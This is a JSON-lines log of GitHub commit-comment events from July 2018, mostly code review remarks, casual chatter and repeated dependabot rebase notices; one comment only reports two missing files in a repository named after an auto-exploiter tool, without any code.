{"id":"8032980399","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871046,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:06:11Z","updated_at":"2018-07-28T22:06:11Z","author_association":"CONTRIBUTOR","body":"oida roesch ich lock gleich deine mama in hühnerkäfig\r\n"}},"created_at":"2018-07-28T22:06:11Z"}
{"id":"8032980898","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871047,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:06:43Z","updated_at":"2018-07-28T22:06:43Z","author_association":"OWNER","body":"hm"}},"created_at":"2018-07-28T22:06:43Z"}
{"id":"8032980969","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871048,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:06:46Z","updated_at":"2018-07-28T22:06:46Z","author_association":"NONE","body":"aaaAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaa"}},"created_at":"2018-07-28T22:06:46Z"}
{"id":"8032981036","type":"CommitCommentEvent","actor":{"login":"iggy"},"repo":{"name":"mschuchard/linter-terraform-syntax"},"payload":{"comment":{"id":29871049,"position":19,"line":44,"path":"lib/main.js","commit_id":"16847944a1c1450a008501344d87ce6d1e4831da","created_at":"2018-07-28T22:06:51Z","updated_at":"2018-07-28T22:06:51Z","author_association":"NONE","body":"`linter-terraform-syntax` ?"}},"created_at":"2018-07-28T22:06:51Z"}
{"id":"8032981162","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29871050,"position":null,"line":null,"path":null,"commit_id":"7f1fe0ed1c3908892678d0a3f1f4b3c1c73374e6","created_at":"2018-07-28T22:07:01Z","updated_at":"2018-07-28T22:07:01Z","author_association":"OWNER","body":"I think there is no PM system on github.\r\nSaw your donation: thanks!"}},"created_at":"2018-07-28T22:07:01Z"}
{"id":"8032981388","type":"CommitCommentEvent","actor":{"login":"iggy"},"repo":{"name":"mschuchard/linter-terraform-syntax"},"payload":{"comment":{"id":29871051,"position":20,"line":45,"path":"lib/main.js","commit_id":"16847944a1c1450a008501344d87ce6d1e4831da","created_at":"2018-07-28T22:07:16Z","updated_at":"2018-07-28T22:07:16Z","author_association":"NONE","body":"Same... With those 2 changes, works for me to ignore my `modules/` dir."}},"created_at":"2018-07-28T22:07:16Z"}
{"id":"8032982140","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29871052,"position":44,"line":178,"path":"Source/Foundation/bsfUtility/Reflection/BsRTTIField.h","commit_id":"f1e7091b28c40e65e904692e29860f013a103a4f","created_at":"2018-07-28T22:08:03Z","updated_at":"2018-07-28T22:08:03Z","author_association":"CONTRIBUTOR","body":"std::move"}},"created_at":"2018-07-28T22:08:03Z"}
{"id":"8032983118","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29871058,"position":17,"line":38,"path":"Source/Foundation/bsfUtility/Reflection/BsRTTIManagedDataBlockField.h","commit_id":"f1e7091b28c40e65e904692e29860f013a103a4f","created_at":"2018-07-28T22:09:00Z","updated_at":"2018-07-28T22:09:00Z","author_association":"CONTRIBUTOR","body":"Could do, instead,\r\n\r\nusing GetterType = SPtr<DataStream> (InterfaceType::*)(ObjectType*, UINT32&);\r\n\r\nBit easier to read."}},"created_at":"2018-07-28T22:09:00Z"}
{"id":"8032984243","type":"CommitCommentEvent","actor":{"login":"rejopol"},"repo":{"name":"ElectraJailbreak/electratools"},"payload":{"comment":{"id":29871070,"position":null,"line":null,"path":null,"commit_id":"149c75e7e1e078c5ec6b3ea066a6a8e70f641387","created_at":"2018-07-28T22:09:55Z","updated_at":"2018-07-28T22:09:55Z","author_association":"NONE","body":"gracias"}},"created_at":"2018-07-28T22:09:55Z"}
{"id":"8032984388","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29871071,"position":76,"line":122,"path":"Source/Foundation/bsfUtility/Reflection/BsRTTIPlainField.h","commit_id":"f1e7091b28c40e65e904692e29860f013a103a4f","created_at":"2018-07-28T22:10:05Z","updated_at":"2018-07-28T22:10:05Z","author_association":"CONTRIBUTOR","body":"Could pass name by value, and use std::move on the init function."}},"created_at":"2018-07-28T22:10:05Z"}
{"id":"8032984764","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29871072,"position":108,"line":149,"path":"Source/Foundation/bsfUtility/Reflection/BsRTTIPlainField.h","commit_id":"f1e7091b28c40e65e904692e29860f013a103a4f","created_at":"2018-07-28T22:10:22Z","updated_at":"2018-07-28T22:10:22Z","author_association":"CONTRIBUTOR","body":"Same advice of pass by value and move."}},"created_at":"2018-07-28T22:10:22Z"}
{"id":"8032986890","type":"CommitCommentEvent","actor":{"login":"anik83"},"repo":{"name":"parhatyadikar/NewFerizeGithub"},"payload":{"comment":{"id":29871073,"position":null,"line":null,"path":null,"commit_id":"136bd3efa2f79c71966feaaac8124d82a862aa13","created_at":"2018-07-28T22:12:17Z","updated_at":"2018-07-28T22:12:17Z","author_association":"COLLABORATOR","body":"what the hell is this my man i didtn' understan really"}},"created_at":"2018-07-28T22:12:17Z"}
{"id":"8032994998","type":"CommitCommentEvent","actor":{"login":"haleyhowe"},"repo":{"name":"kamehta2/HS68_2018_Project_1"},"payload":{"comment":{"id":29871099,"position":10,"line":19,"path":"hs628_tools/normalization_tool.py","commit_id":"5093a9ae47bdbedfb5c36a8fd2317e074c8d893d","created_at":"2018-07-28T22:20:06Z","updated_at":"2018-07-28T22:20:06Z","author_association":"NONE","body":"Is this a boolean value being stored here?\r\n"}},"created_at":"2018-07-28T22:20:06Z"}
{"id":"8033005609","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29871142,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-28T22:30:30Z","updated_at":"2018-07-28T22:30:30Z","author_association":"MEMBER","body":"Personally, I don't think it really matters, though clearly someone at some point thought it matters, because we use `wesnoth.require` and `wesnoth.dofile` rather than `require` and `dofile`."}},"created_at":"2018-07-28T22:30:30Z"}
{"id":"8033006352","type":"CommitCommentEvent","actor":{"login":"AWolf81"},"repo":{"name":"AWolf81/guppy"},"payload":{"comment":{"id":29871151,"position":1,"line":1,"path":"src/services/package-manager.service.js","commit_id":"765fc31825f9d740972945a741ef0332c71a8858","created_at":"2018-07-28T22:31:09Z","updated_at":"2018-07-28T22:31:09Z","author_association":"OWNER","body":"@bennygenel what do you think is it OK to have that constant here? It's more like a configuration constant but I haven't seen a location where I could add this? At the moment, I think it's OK to leave it here as we're not switching between yarn and npm."}},"created_at":"2018-07-28T22:31:09Z"}
{"id":"8033008069","type":"CommitCommentEvent","actor":{"login":"srid"},"repo":{"name":"obsidiansystems/obelisk"},"payload":{"comment":{"id":29871158,"position":null,"line":null,"path":null,"commit_id":"f045057a6e498d8457e10711b561c5c10938c47a","created_at":"2018-07-28T22:32:47Z","updated_at":"2018-07-28T22:32:47Z","author_association":"MEMBER","body":"Yup, just confirmed it. Reverting the update fixed the regression."}},"created_at":"2018-07-28T22:32:47Z"}
{"id":"8033008667","type":"CommitCommentEvent","actor":{"login":"Ronoon"},"repo":{"name":"dresden-elektronik/deconz-rest-plugin"},"payload":{"comment":{"id":29871162,"position":null,"line":null,"path":null,"commit_id":"b570bb4004a4c431ae609e171ee2c4371d7de0e7","created_at":"2018-07-28T22:33:21Z","updated_at":"2018-07-28T22:33:21Z","author_association":"NONE","body":"Maybe i´m wrong but in line 1077  <attribute-set id=\"01\" description=\"Window Covering Settings\"> shouldn´t there an  \"10\" instead of \"01\" ??\r\nlike in these description:\r\n![image](https://user-images.githubusercontent.com/41126336/43361071-21c88f98-92c6-11e8-9c05-51606c583077.png)\r\n\r\nalso, if i´m not wrong shouldn´t there be in line 1079 ff        <attribute id=\"0x0101\"\r\nanything like this <attribute id=\"0x0011\" ? \r\n\r\n![image](https://user-images.githubusercontent.com/41126336/43361101-c924b5be-92c6-11e8-8501-1036aba8e6b8.png)\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-28T22:33:21Z"}
{"id":"8033009044","type":"CommitCommentEvent","actor":{"login":"SpEZiiL"},"repo":{"name":"SpEZiiL/MFederczuk-Library"},"payload":{"comment":{"id":29871163,"position":null,"line":null,"path":null,"commit_id":"04c2acca8db3f3e25a5261bfc460674ade2a0f3b","created_at":"2018-07-28T22:33:43Z","updated_at":"2018-07-28T22:33:43Z","author_association":"OWNER","body":"v1.1 not 1.0 I'm fucking stupid"}},"created_at":"2018-07-28T22:33:43Z"}
{"id":"8033012292","type":"CommitCommentEvent","actor":{"login":"killer00760"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29871171,"position":1,"line":1,"path":"README.md","commit_id":"f505443393caf619f2c5dbbbf6226c9e271c82e5","created_at":"2018-07-28T22:36:56Z","updated_at":"2018-07-28T22:36:56Z","author_association":"NONE","body":"GameGemPackages"}},"created_at":"2018-07-28T22:36:56Z"}
{"id":"8033012377","type":"CommitCommentEvent","actor":{"login":"parhatyadikar"},"repo":{"name":"anik83/NewFerizeGithub"},"payload":{"comment":{"id":29871172,"position":null,"line":null,"path":null,"commit_id":"f6dc96c5198d231e25c2ea99982f25cab6ba44bf","created_at":"2018-07-28T22:37:01Z","updated_at":"2018-07-28T22:37:01Z","author_association":"NONE","body":"Hi , I am Perhat"}},"created_at":"2018-07-28T22:37:01Z"}
{"id":"8033015128","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871178,"position":null,"line":null,"path":null,"commit_id":"4d43d7d48961169d9e78746396a7f2de44e62340","created_at":"2018-07-28T22:39:37Z","updated_at":"2018-07-28T22:39:37Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #21 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:39:37Z"}
{"id":"8033015613","type":"CommitCommentEvent","actor":{"login":"nounoum"},"repo":{"name":"04x/ICG-AutoExploiterBoT"},"payload":{"comment":{"id":29871179,"position":null,"line":null,"path":null,"commit_id":"e4f4f4c495f382e57d7bd936049fb7755e2cb7f2","created_at":"2018-07-28T22:40:02Z","updated_at":"2018-07-28T22:40:02Z","author_association":"NONE","body":"https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php\r\nhttps://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt \r\nare missing bro \"404: Not Found\"\r\n"}},"created_at":"2018-07-28T22:40:02Z"}
{"id":"8033019748","type":"CommitCommentEvent","actor":{"login":"CertifiedMrLuke"},"repo":{"name":"CertifiedMrLuke/GrabGitData"},"payload":{"comment":{"id":29871187,"position":null,"line":null,"path":null,"commit_id":"de4a5592c0ec5b23f278b3c37a482913a41fd514","created_at":"2018-07-28T22:43:26Z","updated_at":"2018-07-28T22:43:26Z","author_association":"OWNER","body":"# reowned"}},"created_at":"2018-07-28T22:43:26Z"}
{"id":"8033020345","type":"CommitCommentEvent","actor":{"login":"SIddharthPyapali"},"repo":{"name":"SIddharthPyapali/FTC-EscapeVelocity"},"payload":{"comment":{"id":29871188,"position":1,"line":1,"path":"Pre-Season Color Challenge","commit_id":"3b1e42b5c79c1e1749fda6fa9ab46f2f60d51420","created_at":"2018-07-28T22:43:52Z","updated_at":"2018-07-28T22:43:52Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-28T22:43:52Z"}
{"id":"8033020571","type":"CommitCommentEvent","actor":{"login":"JorgeCastilloPrz"},"repo":{"name":"arrow-kt/arrow"},"payload":{"comment":{"id":29871189,"position":275,"line":502,"path":"modules/docs/arrow-docs/docs/docs/patterns/monads/README.md","commit_id":"c25aca38d219af159d77a26c36a2d20b3ccdd2cf","created_at":"2018-07-28T22:44:04Z","updated_at":"2018-07-28T22:44:04Z","author_association":"MEMBER","body":"After \"one common misconception.\" I'd add another line: \"Many people calls Monads to types like Option, Future, Either... and so on, and that's not correct. Those are called data types (+link to docs).\""}},"created_at":"2018-07-28T22:44:04Z"}
{"id":"8033021085","type":"CommitCommentEvent","actor":{"login":"thiagomess"},"repo":{"name":"thiagomess/financas-JPA"},"payload":{"comment":{"id":29871193,"position":6,"line":19,"path":".classpath","commit_id":"85b733a1b3693277fcf3beeaf54e5a725e53e1ec","created_at":"2018-07-28T22:44:29Z","updated_at":"2018-07-28T22:44:29Z","author_association":"OWNER","body":"Adicionado nova versao do JAR"}},"created_at":"2018-07-28T22:44:29Z"}
{"id":"8033021507","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871195,"position":null,"line":null,"path":null,"commit_id":"c28c135d21b461617797a6ca4b5efc66b9aa6f59","created_at":"2018-07-28T22:44:53Z","updated_at":"2018-07-28T22:44:53Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #13 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:44:53Z"}
{"id":"8033021907","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871199,"position":null,"line":null,"path":null,"commit_id":"571a3ef4c036d68049aaf98f872d00ea6db70796","created_at":"2018-07-28T22:45:16Z","updated_at":"2018-07-28T22:45:16Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #1 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:45:16Z"}
{"id":"8033022001","type":"CommitCommentEvent","actor":{"login":"borkovic"},"repo":{"name":"rakitzis/rc"},"payload":{"comment":{"id":29871200,"position":null,"line":null,"path":null,"commit_id":"9d071b26bf1b1dcd71efb06dc4fb6c25803856a0","created_at":"2018-07-28T22:45:22Z","updated_at":"2018-07-28T22:45:22Z","author_association":"CONTRIBUTOR","body":"I don't use `if not` so I'd like to hear from others whether my understanding of the correct behavior is accurate.  I believe that the first output (a2 and a3 for static `old_if_state`) is **not correct**, and the second output (a3 for on-stack `old_if_state`) is **correct**.\r\n\r\nIf my understanding is correct, I will post a pull request with the change.\r\n\r\nThe script:\r\n```\r\n$ cat ifnot\r\nif (true) {\r\n    if (false) {\r\n        echo a1\r\n    }\r\n    if not echo a2\r\n}\r\nif not echo a3\r\n```\r\n\r\nWith static `old_if_state`:\r\n```\r\n$ ./rc ifnot \r\na2\r\na3\r\n$\r\n```\r\n\r\nWith `old_if_state` on stack:\r\n```\r\n$ $HOME/bin/rc ifnot \r\na2\r\n$\r\n```\r\n"}},"created_at":"2018-07-28T22:45:22Z"}
{"id":"8033022412","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871202,"position":null,"line":null,"path":null,"commit_id":"acaedd7d42d5167c4fa1008c7a5b40788f0dbb72","created_at":"2018-07-28T22:45:44Z","updated_at":"2018-07-28T22:45:44Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #3 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:45:44Z"}
{"id":"8033022839","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871203,"position":null,"line":null,"path":null,"commit_id":"c2ea6ca9502041bf00503cddc57e4c927c3731c1","created_at":"2018-07-28T22:46:06Z","updated_at":"2018-07-28T22:46:06Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #6 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:46:06Z"}
{"id":"8033026027","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871210,"position":null,"line":null,"path":null,"commit_id":"c2ea6ca9502041bf00503cddc57e4c927c3731c1","created_at":"2018-07-28T22:49:01Z","updated_at":"2018-07-28T22:49:01Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #6 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:49:01Z"}
{"id":"8033026428","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871214,"position":null,"line":null,"path":null,"commit_id":"04cdb2d5dfb111a7a622401aea72c9430dce0410","created_at":"2018-07-28T22:49:23Z","updated_at":"2018-07-28T22:49:23Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #8 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:49:23Z"}
{"id":"8033027782","type":"CommitCommentEvent","actor":{"login":"mcfarhat"},"repo":{"name":"mcfarhat/actifit"},"payload":{"comment":{"id":29871218,"position":null,"line":null,"path":null,"commit_id":"17e1c46cefc635975165bb462711ebd381fe57d9","created_at":"2018-07-28T22:50:32Z","updated_at":"2018-07-28T22:50:32Z","author_association":"OWNER","body":"switched to version 0.3.0"}},"created_at":"2018-07-28T22:50:32Z"}
{"id":"8033028093","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871221,"position":null,"line":null,"path":null,"commit_id":"c2ea6ca9502041bf00503cddc57e4c927c3731c1","created_at":"2018-07-28T22:50:50Z","updated_at":"2018-07-28T22:50:50Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #6 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:50:50Z"}
{"id":"8033028386","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871222,"position":null,"line":null,"path":null,"commit_id":"1145ca42fb950f32ae12401ea4a3a01861717114","created_at":"2018-07-28T22:51:08Z","updated_at":"2018-07-28T22:51:08Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #10 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:51:08Z"}
{"id":"8033029052","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871224,"position":null,"line":null,"path":null,"commit_id":"7502eb1c0dcc867f6007beb790ffb20b23159636","created_at":"2018-07-28T22:51:44Z","updated_at":"2018-07-28T22:51:44Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #9 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:51:44Z"}
{"id":"8033029447","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871225,"position":null,"line":null,"path":null,"commit_id":"9c2803062c477ad71fb805592c510daba756e066","created_at":"2018-07-28T22:52:06Z","updated_at":"2018-07-28T22:52:06Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #19 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:52:06Z"}
{"id":"8033029583","type":"CommitCommentEvent","actor":{"login":"cemeyer"},"repo":{"name":"openbsm/openbsm"},"payload":{"comment":{"id":29871227,"position":51,"line":60,"path":"bin/auditd/audit_warn.c","commit_id":"aa0e5f0d99750b70be8086039a442c53e01cf40b","created_at":"2018-07-28T22:52:13Z","updated_at":"2018-07-28T22:52:13Z","author_association":"CONTRIBUTOR","body":"I'd spell 8 as `nitems(loc_args) - 1`."}},"created_at":"2018-07-28T22:52:13Z"}
{"id":"8033030398","type":"CommitCommentEvent","actor":{"login":"cemeyer"},"repo":{"name":"openbsm/openbsm"},"payload":{"comment":{"id":29871231,"position":52,"line":61,"path":"bin/auditd/audit_warn.c","commit_id":"aa0e5f0d99750b70be8086039a442c53e01cf40b","created_at":"2018-07-28T22:52:52Z","updated_at":"2018-07-28T22:52:52Z","author_association":"CONTRIBUTOR","body":"Is there any value in using `__DECONST()` here vs `va_arg(ap, char *)`?"}},"created_at":"2018-07-28T22:52:52Z"}
{"id":"8033030506","type":"CommitCommentEvent","actor":{"login":"killer00760"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29871232,"position":1,"line":1,"path":"README.md","commit_id":"f505443393caf619f2c5dbbbf6226c9e271c82e5","created_at":"2018-07-28T22:52:56Z","updated_at":"2018-07-28T22:52:56Z","author_association":"NONE","body":"# GameGemPackages"}},"created_at":"2018-07-28T22:52:56Z"}
{"id":"8033030960","type":"CommitCommentEvent","actor":{"login":"cemeyer"},"repo":{"name":"openbsm/openbsm"},"payload":{"comment":{"id":29871233,"position":49,"line":58,"path":"bin/auditd/audit_warn.c","commit_id":"aa0e5f0d99750b70be8086039a442c53e01cf40b","created_at":"2018-07-28T22:53:22Z","updated_at":"2018-07-28T22:53:22Z","author_association":"CONTRIBUTOR","body":"I was picturing a single cast of `loc_args` itself in `execv()` invocation but this is fine too."}},"created_at":"2018-07-28T22:53:22Z"}
{"id":"8033031076","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871235,"position":null,"line":null,"path":null,"commit_id":"43cf544ed904cebcd8ded827a41c3e5dbe6e4de8","created_at":"2018-07-28T22:53:26Z","updated_at":"2018-07-28T22:53:26Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #2 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:53:26Z"}
{"id":"8033031654","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871238,"position":null,"line":null,"path":null,"commit_id":"db3dac2207e866495ce76f56f8911484ed26d23a","created_at":"2018-07-28T22:53:56Z","updated_at":"2018-07-28T22:53:56Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #14 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:53:56Z"}
{"id":"8033031811","type":"CommitCommentEvent","actor":{"login":"cemeyer"},"repo":{"name":"openbsm/openbsm"},"payload":{"comment":{"id":29871239,"position":75,"line":84,"path":"bin/auditd/audit_warn.c","commit_id":"aa0e5f0d99750b70be8086039a442c53e01cf40b","created_at":"2018-07-28T22:54:07Z","updated_at":"2018-07-28T22:54:07Z","author_association":"CONTRIBUTOR","body":"style(9) adds a space here: `return (foo)`.  Not sure what the prevailing style is in OpenBSM, though."}},"created_at":"2018-07-28T22:54:07Z"}
{"id":"8033032941","type":"CommitCommentEvent","actor":{"login":"rjmarques"},"repo":{"name":"daveagill/PaprikaLang"},"payload":{"comment":{"id":29871243,"position":20,"line":20,"path":"README.md","commit_id":"b91053acc4e4ddcc052603f257be71a72a23de18","created_at":"2018-07-28T22:55:08Z","updated_at":"2018-07-28T22:55:08Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/19153038/43361238-a58721b4-92c1-11e8-9b1a-7c7037fd2ac7.png)\r\n"}},"created_at":"2018-07-28T22:55:08Z"}
{"id":"8033033350","type":"CommitCommentEvent","actor":{"login":"asomers"},"repo":{"name":"openbsm/openbsm"},"payload":{"comment":{"id":29871245,"position":52,"line":61,"path":"bin/auditd/audit_warn.c","commit_id":"aa0e5f0d99750b70be8086039a442c53e01cf40b","created_at":"2018-07-28T22:55:30Z","updated_at":"2018-07-28T22:55:30Z","author_association":"CONTRIBUTOR","body":"Not as far as the compiler is concerned.  But it makes it explicit.  Using `va_arg` to do the cast looks like a mistake."}},"created_at":"2018-07-28T22:55:30Z"}
{"id":"8033033837","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871248,"position":null,"line":null,"path":null,"commit_id":"76380b28e980bc0bdf75760a916a9a18a7e22d90","created_at":"2018-07-28T22:55:56Z","updated_at":"2018-07-28T22:55:56Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #16 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:55:56Z"}
{"id":"8033035331","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871254,"position":null,"line":null,"path":null,"commit_id":"04cdb2d5dfb111a7a622401aea72c9430dce0410","created_at":"2018-07-28T22:57:19Z","updated_at":"2018-07-28T22:57:19Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #8 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:57:19Z"}
{"id":"8033035408","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871255,"position":null,"line":null,"path":null,"commit_id":"0e4864f3c75dd3ca7cc7b4070e3aa0409bcb14ba","created_at":"2018-07-28T22:57:24Z","updated_at":"2018-07-28T22:57:24Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #7 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:57:24Z"}
{"id":"8033035492","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871257,"position":null,"line":null,"path":null,"commit_id":"c2ea6ca9502041bf00503cddc57e4c927c3731c1","created_at":"2018-07-28T22:57:28Z","updated_at":"2018-07-28T22:57:28Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #6 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:57:28Z"}
{"id":"8033035579","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871259,"position":null,"line":null,"path":null,"commit_id":"eae0970afb4acbbca94f73c1786fbf6c6e24b7d9","created_at":"2018-07-28T22:57:33Z","updated_at":"2018-07-28T22:57:33Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #5 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:57:33Z"}
{"id":"8033035670","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871261,"position":null,"line":null,"path":null,"commit_id":"22eba2f4d68cab03445dba4837cc09d89fa0147c","created_at":"2018-07-28T22:57:39Z","updated_at":"2018-07-28T22:57:39Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #4 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:57:39Z"}
{"id":"8033036922","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871262,"position":null,"line":null,"path":null,"commit_id":"165f5dd887926b7678fdf4c0cf338abc5936ad46","created_at":"2018-07-28T22:58:52Z","updated_at":"2018-07-28T22:58:52Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #20 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:58:52Z"}
{"id":"8033037036","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871263,"position":null,"line":null,"path":null,"commit_id":"1145ca42fb950f32ae12401ea4a3a01861717114","created_at":"2018-07-28T22:58:59Z","updated_at":"2018-07-28T22:58:59Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #10 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:58:59Z"}
{"id":"8033037125","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871264,"position":null,"line":null,"path":null,"commit_id":"4685217f75ef750cb948fc976f693ae1b1d7b66c","created_at":"2018-07-28T22:59:04Z","updated_at":"2018-07-28T22:59:04Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #11 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:59:04Z"}
